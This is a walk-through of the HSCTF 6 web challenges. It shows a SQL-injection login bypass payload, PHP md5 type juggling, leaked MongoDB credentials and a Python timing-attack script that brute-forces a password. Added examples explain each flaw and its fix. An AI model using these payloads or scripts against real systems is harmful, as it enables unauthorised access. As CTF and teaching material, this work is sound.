HSCTF 6 — Web Challenges
HSCTF 6 is over. I started solving the challenges, specifically the web ones, and completed all of them. This is going to be a walk-through of those challenges, so let's begin.
1. Inspect Me
We are provided with a link, and the flag is in three parts. As the name suggests, this one is all about inspecting, i.e. looking through the source code.
The first part of the flag was in the source code of the main page.
The second part of the flag was in style.css.
The third part was in script.js.
That was pretty easy!
2. Agent Keith
This is the second challenge!
We are shown an error that depends on our User-Agent header, which means the check has something to do with the user agent. Let's look at the source code!
We can see the user agent expected for DEBUG mode. Let's send a request with that User-Agent using curl and get the flag :))
We got the flag!
3. S-Q-L
This challenge is all about SQL injection, specifically a SQL login bypass. On opening the link we are presented with a login panel.
Let's check whether it is vulnerable.
It is definitely vulnerable. Let's bypass the login with the payload: ' or ' 1=1
We are done with the challenge!
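To show what the bypass above actually does to the query, here is an added Python example (not part of the original write-up) using an in-memory SQLite database with a constructed users table: the string-concatenated query that the payload breaks out of, beside the parameterized query that treats the same input as plain data. The payload is written in the classic ' OR '1'='1 form of the quote-breaking trick quoted above; the table, credentials and function names are constructed for the demo.

```python
import sqlite3


def make_demo_db():
    # Constructed demo data: one user with a known password (not from the challenge).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'demo-password')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Builds the SQL by string concatenation, so a quote in the input ends the literal
    # early and the rest of the input becomes SQL. This is the bug behind the bypass.
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    # Placeholders: the driver passes the values separately from the statement, so the
    # same payload is compared as an ordinary string and never changes the query.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Classic quote-breaking payload: closes the password literal and appends an
# OR condition that is always true, so every row matches.
BYPASS_PAYLOAD = "' OR '1'='1"


def demo():
    conn = make_demo_db()
    return {
        "vulnerable_with_payload": login_vulnerable(conn, "admin", BYPASS_PAYLOAD),
        "vulnerable_wrong_password": login_vulnerable(conn, "admin", "wrong"),
        "parameterized_with_payload": login_parameterized(conn, "admin", BYPASS_PAYLOAD),
        "parameterized_right_password": login_parameterized(conn, "admin", "demo-password"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The vulnerable function ends up executing WHERE username='admin' AND password='' OR '1'='1', which is true for every row, while the parameterized one compares the literal string and finds nothing.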
4. The Quest
This challenge is a quest. On opening the link we are presented with a Google Form!
We need the password for the first stage. But before doing that, we will take a look at the source code!
The flag is already in the source code :))
5. Keith Logger
We are provided with a file. Let's download it, run the file command on it and see what we can do with it.
The file is a Google Chrome extension. Let's try to unzip it.
We now have three files. The content.js file gives us database information; the other two are not of much interest.
On visiting the admin link we get the following information.
Link/Port: keith-logger-mongodb.web.chal.hsctf.com:27017
Password: keithkeithkeith
Role: admin
Database: admin
There are different ways to connect to MongoDB. You can use any client: the MongoDB shell, Robo 3T, a NoSQL client, etc. The choice is yours. I will be using Robo 3T here, as I am on Windows while writing about this challenge!
On a successful connection we can navigate the database and easily find the flag :))
That’s all. We are done with this challenge :))
6. md5
On opening the link we are provided with the PHP code!
On inspecting the PHP code we can conclude that the md5 of the input string is being compared to the input itself! WTH? Secondly, the if statement uses the loose comparison operator (==) instead of strict comparison (===), which means we can easily bypass it with the help of PHP type juggling.
I remembered reading a presentation on this a year ago; here is the link :)) https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
I used a Python script written for the same kind of challenge in another CTF and changed it to fit this case.
The code can be found at https://github.com/bl4de/ctf/blob/master/2017/HackDatKiwi_CTF_2017/md5games1/md5games1.md
[+] found! md5( 0e251288019 ) ---> 0e874956163641961271069404332409
[+] in 251288020 iterations
Finally we got the flag!
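Why == fails here is easy to see once PHP's numeric-string rule is spelled out, so here is an added Python example (not the page's or bl4de's code) that emulates PHP's loose and strict string comparison, applies both to the md5($s) == $s check described above, and shows the fix. The magic inputs QNKCDZO, 240610708 and 0e215962017 are widely published examples assumed here, not values taken from this page; everything else is constructed for the demo.

```python
import hashlib
import re

# PHP (before version 8) treats a string as "numeric" when it looks like an int or
# float: optional sign, digits, optional fraction, optional exponent. "0e1234" is
# therefore the number 0 * 10**1234 == 0. A 32-char hex digest that starts with "0e"
# and otherwise contains only decimal digits matches this shape, so two such digests
# compare equal with == because both are zero.
PHP_NUMERIC_STRING = re.compile(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def php_is_numeric_string(s):
    return PHP_NUMERIC_STRING.fullmatch(s) is not None


def php_loose_equals(a, b):
    # Emulates PHP's == on two strings: numeric strings are compared as numbers.
    if php_is_numeric_string(a) and php_is_numeric_string(b):
        return float(a) == float(b)
    return a == b


def php_strict_equals(a, b):
    # Emulates PHP's ===: same type and same value, no conversion.
    return a == b


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def check_loose(user_input):
    # The challenge's check as the write-up describes it: md5($s) == $s.
    return php_loose_equals(md5_hex(user_input), user_input)


def check_strict(user_input):
    # The fix: === (or hash_equals() when comparing secrets) never turns "0e..." into 0.
    return php_strict_equals(md5_hex(user_input), user_input)


# Well-known magic inputs whose md5 digests are "0e" followed only by digits
# (assumed from public lists, not taken from the page).
MAGIC_PAIR = ("QNKCDZO", "240610708")
# A well-known input that is itself a numeric "0e..." string and whose md5 is also
# "0e<digits>", which is exactly what md5($s) == $s needs.
SELF_MAGIC = "0e215962017"


if __name__ == "__main__":
    a, b = md5_hex(MAGIC_PAIR[0]), md5_hex(MAGIC_PAIR[1])
    print(a, b, "loose:", php_loose_equals(a, b), "strict:", php_strict_equals(a, b))
    print(SELF_MAGIC, "->", md5_hex(SELF_MAGIC),
          "loose:", check_loose(SELF_MAGIC), "strict:", check_strict(SELF_MAGIC))
```

Switching the comparison to === (check_strict) is the whole fix; for real secrets PHP's hash_equals() additionally makes the comparison constant-time.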
7. Accessible Rich Internet Applications
In this challenge we are provided with an index.html file. Let's download the file and grab the password!
We get a search bar. Let's check the source code!
We can see junk data that does not really make any sense. However, when viewed in the developer tools the source code starts to make sense.
We can see that on every user input, options are selected randomly from the list, so it actually does not care what we enter ;)
Let's replace the file with the code that makes sense and write a Python script to automate the task!
from bs4 import BeautifulSoup

with open("index.html") as tx:
    soup = BeautifulSoup(tx, "html.parser")

# collect the aria-posinset index of every option element to see how many there are
dig = []
for item in soup.find_all('div', {'role': "option"}):
    dig.append(int(item['aria-posinset']))
print(len(dig))
The second script!
from bs4 import BeautifulSoup

def binary2ascii(s):
    # turn a string of '0'/'1' characters into text, 8 bits per character
    return ''.join(chr(int(s[i*8:i*8+8], 2)) for i in range(len(s)//8))

with open("index.html") as tx:
    soup = BeautifulSoup(tx, "html.parser")

a = 0
flag = []
# walk the options in aria-posinset order; each option holds a single bit
for i in range(0, 1040):
    flag.append(soup.find('div', {'aria-posinset': str(i)}).contents[0])
    a += 1
    if a % 8 == 0:
        print(binary2ascii("".join(flag)), end='')
        flag.clear()
And we got the flag: flag{accessibility_is_crucial}
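The trick in this challenge is that the bits are scattered through the DOM and only aria-posinset gives their real order. As an added, self-contained example (not the write-up's scripts, which need the real index.html and BeautifulSoup), here is the same decoding done with the standard-library HTML parser on a constructed page that emits one option per bit in scrambled DOM order, plus a decoy div that the filter must ignore. The sample text "OK" and the helper names are constructed for the demo.

```python
import random
from html.parser import HTMLParser


class OptionCollector(HTMLParser):
    """Collects the text of every <div role="option"> keyed by its aria-posinset value."""

    def __init__(self):
        super().__init__()
        self.options = {}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "div" and a.get("role") == "option" and a.get("aria-posinset"):
            self._current = int(a["aria-posinset"])
            self.options.setdefault(self._current, "")

    def handle_data(self, data):
        # only text inside an option div is part of the payload
        if self._current is not None:
            self.options[self._current] += data.strip()

    def handle_endtag(self, tag):
        if tag == "div":
            self._current = None


def bits_to_text(bits):
    # 8 bits per character; trailing bits that do not fill a byte are ignored
    return "".join(chr(int(bits[i:i + 8], 2))
                   for i in range(0, len(bits) - len(bits) % 8, 8))


def decode_options(html):
    # Order by aria-posinset, not by DOM order: the markup shuffles the options.
    parser = OptionCollector()
    parser.feed(html)
    bits = "".join(parser.options[k] for k in sorted(parser.options))
    return bits_to_text(bits)


def build_sample(text, seed=7):
    # Constructed sample page: one option per bit, written out in a scrambled DOM
    # order (1-based aria-posinset), plus a decoy div without a role attribute.
    bits = "".join(format(ord(c), "08b") for c in text)
    order = list(range(1, len(bits) + 1))
    random.Random(seed).shuffle(order)
    divs = ['<div role="option" aria-posinset="%d" aria-setsize="%d">%s</div>'
            % (i, len(bits), bits[i - 1]) for i in order]
    return '<div role="listbox"><div>junk</div>' + "".join(divs) + "</div>"


SAMPLE_HTML = build_sample("OK")

if __name__ == "__main__":
    print(decode_options(SAMPLE_HTML))
```

Sorting by the aria-posinset attribute is what makes the decoder independent of how the page shuffles its markup, which is exactly why the write-up's second script looks each index up by that attribute instead of iterating the DOM.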
8. Networked Password
This challenge is time-based, and since it is networked we need to automate the process in order to recover the password :))
import requests
import string

link = 'https://networked-password.web.chal.hsctf.com'
charset = string.ascii_letters + string.digits + string.punctuation
# print(charset)
flag = "hsctf{"
resp = 0
char = ""
# for each position, try every character and keep the one whose request took longest
while flag[-1] != "}":
    for i in charset:
        payload = {"password": flag + i}
        r = requests.post(link, data=payload)
        if r.elapsed.total_seconds() > resp:
            resp = r.elapsed.total_seconds()
            char = i
    flag += char
    resp = 0
    print("[+] Current Flag: " + flag)
And the script gives us the flag, one character at a time!
[+] Flag: hsctf{s
[+] Flag: hsctf{sm
[+] Flag: hsctf{sm0
[+] Flag: hsctf{sm0l
[+] Flag: hsctf{sm0l_
[+] Flag: hsctf{sm0l_f
[+] Flag: hsctf{sm0l_fl
[+] Flag: hsctf{sm0l_fl4
[+] Flag: hsctf{sm0l_fl4g
[+] Flag: hsctf{sm0l_fl4g}
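The reason the loop above works is that the server compares the password character by character and stops at the first mismatch, so a longer correct prefix costs more time. Here is an added Python simulation (not the write-up's script) that makes this visible offline: an early-exit comparison and a constant-time one (hmac.compare_digest) both report how many characters they examined, standing in for response time, and the write-up's recovery loop is run against each. The secret "hsctf{demo}" and the oracle/function names are constructed for the demo.

```python
import hmac
import string

# Constructed secret for the simulation (not the challenge's flag).
SECRET = "hsctf{demo}"
CHARSET = string.ascii_letters + string.digits + string.punctuation


def leaky_equals(secret, guess):
    """Early-exit comparison. Returns (equal, characters_examined). The second value
    stands in for response time: the loop stops at the first mismatch, so a guess that
    shares a longer prefix with the secret does more work before it fails."""
    steps = 0
    for i in range(max(len(secret), len(guess))):
        steps += 1
        if i >= len(secret) or i >= len(guess) or secret[i] != guess[i]:
            return False, steps
    return True, steps


def constant_time_equals(secret, guess):
    """hmac.compare_digest looks at every byte no matter where the first mismatch is,
    so the work done does not depend on which characters of the guess are right."""
    steps = max(len(secret), len(guess))
    return hmac.compare_digest(secret.encode(), guess.encode()), steps


def recover_by_timing(oracle, prefix="hsctf{", max_len=32):
    # The same loop as the write-up's script, driven by the simulated oracle instead of
    # HTTP: for each position keep the character whose check examined the most chars.
    flag = prefix
    while len(flag) < max_len:
        best_char, best_steps = "", -1
        for c in CHARSET:
            equal, steps = oracle(SECRET, flag + c)
            if equal:
                return flag + c
            if steps > best_steps:
                best_char, best_steps = c, steps
        flag += best_char
    return flag


if __name__ == "__main__":
    print("early-exit compare  ->", recover_by_timing(leaky_equals))
    print("constant-time compare ->", recover_by_timing(constant_time_equals))
```

Against leaky_equals the loop walks straight to the secret because the right character is always the one with the highest step count; against constant_time_equals every character ties, the loop just picks the first entry of the charset each time, and the secret is never recovered. The server-side fix is therefore a constant-time comparison (and, for stored credentials, comparing hashes rather than raw passwords so that length is not leaked either).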
That's all for the web challenges! I will be sharing the solutions for the other categories as well ;))